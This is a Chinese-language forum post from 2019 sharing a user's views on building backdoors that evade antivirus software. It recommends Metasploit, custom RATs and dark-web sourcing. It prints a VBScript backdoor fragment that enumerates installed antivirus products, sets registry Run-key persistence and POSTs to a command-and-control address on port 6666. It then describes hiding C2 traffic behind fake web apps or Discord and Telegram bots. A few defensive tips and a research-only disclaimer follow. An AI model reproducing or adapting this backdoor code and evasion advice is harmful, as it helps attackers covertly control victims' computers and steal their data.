伊莉討論區

標題: 後門之個人見解 [打印本頁]
作者: pentest.tw    時間: 2019-2-19 03:58 PM     標題: 後門之個人見解

本帖最後由 pentest.tw 於 2019-2-23 01:51 PM 編輯

[attach]126448973[/attach]


最近看到有人發表了資安相關的主題 - https://wwwgg.eyny.com/thread-11979142-1-1.html

有了些想法和個人見解,因此來跟大家分享~~




我個人認為Metasploit+Meterpreter比較好用,Meterpreter附有一大堆強大的模組,例如導出後門類型和obfuscater,且Kali Linux預設就有了


TheFatRat雖然不錯,但功能卻沒有Metasploit強大

況且github上還有一堆開源且支援Metasploit的工具,例如shelter

其實不管是用哪種RAT,只要其生成後門Signature Code的被記錄了

不管用什麼方法Obfuscate,都很難騙過防毒軟體


最好是以自己的想法寫專屬於自己的後門,或到暗網去找

最好做成像botnetclient端一樣

本人偏向使用VBScript,因為非專業人士較難發現其蹤跡

功能較少,基本就UninstallUpdateRun Script等功能

因此有很高的機率繞過防毒軟體


*提供部分程式碼以供參考 -

  1. On error resume next

  3. j = array("WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP")
  4. g = array("HKCU","HKLM","HKCU\vw0rm","\Software\Microsoft\Windows\CurrentVersion\Run\","HKLM\SOFTWARE\Classes\","REG_SZ","\defaulticon\")
  5. y= array("winmgmts:","win32_logicaldisk","Win32_OperatingSystem","winmgmts:\\localhost\root\securitycenter","AntiVirusProduct")

  7. function go(m)
  8. if m=4 then
  9. T="winmgmts:\\localhost\root\securitycenter"
  10. Set B=GetObject(y(3)).InstancesOf(y(4))
  11. for each a in b
  12. go=a.displayName
  13. exit for
  14. next
  15. Set B=GetObject(y(3) & "2").InstancesOf(y(4))
  16. for each a in b
  17. go=a.displayName
  18. exit for
  19. next
  20. if go="" then go="Not-found"
  21. else
  22. Set B=GetObject(y(0)).InstancesOf(y(m))
  23. for each a in b
  24. if m = 1 then
  25. go=a.volumeserialnumber
  26. elseif m = 2 then
  27. go=a.caption
  28. end if
  29. exit for
  30. next
  31. end if
  32. end function

  34. set w = WScript
  35. set sh = Cr(0)
  36. set fs = Cr(1)

  38. Function Cr(N)
  39. Set Cr = CreateObject(j(N))
  40. End Function

  42. function Ex(s)
  43. Ex = sh.ExpandEnvironmentStrings("%"&s&"%")
  44. end function

  46. function Pt(C,A)
  47. Pt=""
  48. Set X=Cr(3)
  49. X.Open "POST","http://1.1.1.1:6666/"&C,false
  50. X.setrequestheader "User-Agent:",nf
  51. X.send A
  52. Pt=X.responsetext
  53. end function
複製代碼


我在這裡稱這種後門Stealthy,非常難以被發現

當電腦被Stealthy感染後,主控端可以選擇什麼都不做,保持遠端存取權

等待時機再植入功能健全但較容易被發現的後門

就算被發現了,Stealthy也不會有事,可以做更好的obfuscate後再更新


例如: 用Android Studio撰寫偽造成Web App 的程式(我自己沒試過,Java語言對我來說太噁心了,由於我是針對Windows平台的,所以是用.Net Framework。用這語言寫的後門幾乎都有提供Entry Point,這導致它們很容易被obfuscate)

保持與偽裝成網站的Server的連線(建議用VPN+Port Forwarding,我在其他主題的回覆有說明過,這裡不做說明),傳送HTTP請求,網站再下達命令,這樣看起來就像合法的App


其實現在較時尚的方法是直接使用合法且熱門的社交媒體Bot API來撰寫後門,例如Discord, Telegram,這種後門的好處就在於它的便利性與極低的可疑度

請自行搜索Discord Selfbot、Telegram Remote Bot關鍵字,建議到Github尋找相關參考資源


防毒軟體對日異月新的病毒防不勝防,永遠不要認為有了防毒軟體就安全了

以下提供幾個小Tip來防範:


1.如果從網路上下載了來路不明的檔案,一定要先用SandBoxie跑過一便,搭配Proxifier之類的嗅探工具就更完美了


要是懶得安裝,那麼就把檔案傳到線上沙箱掃描 - https://sandbox.anlyz.io/#!/files

它會給你非常詳盡的報告,包括請求的IP、VirusTotal報告、檔案資訊等等資料


2.有網路攝影機的人,平時沒在用就把它貼起來


3.Hitman Alert能有效的保護個人隱私,搭配Comodo Firewall會更好


4.如果已知後門為.Net Framework架構(用ExeInfo得知)

線上檔案識別工具 - [ur]https://www.toolsley.com/file.html

Dnspy來進行Reverse Engineering

另外還有例如: DIE、.NET Reflector、pestudio、UniExtract 2.0、HxD等工具

請自行爬文


5.(會持續更新)



*相關文章 - 難以被防毒軟體偵測的鍵盤側錄後門



*免責聲明

本人並未詳細說明如何製作"病毒",僅分享方向以及手法。

本圖像皆從網上搜集轉載,不承擔任何技術及版權問題。

以上資訊僅供研究用途,目的在於公布駭客的邏輯思路,以達到防範的效果。
本人亦不承擔會員將本站資源用於盈利和/或非法目的之任何後果和/或法律責任。






歡迎光臨 伊莉討論區 (http://a408.file-static.com/) Powered by Discuz!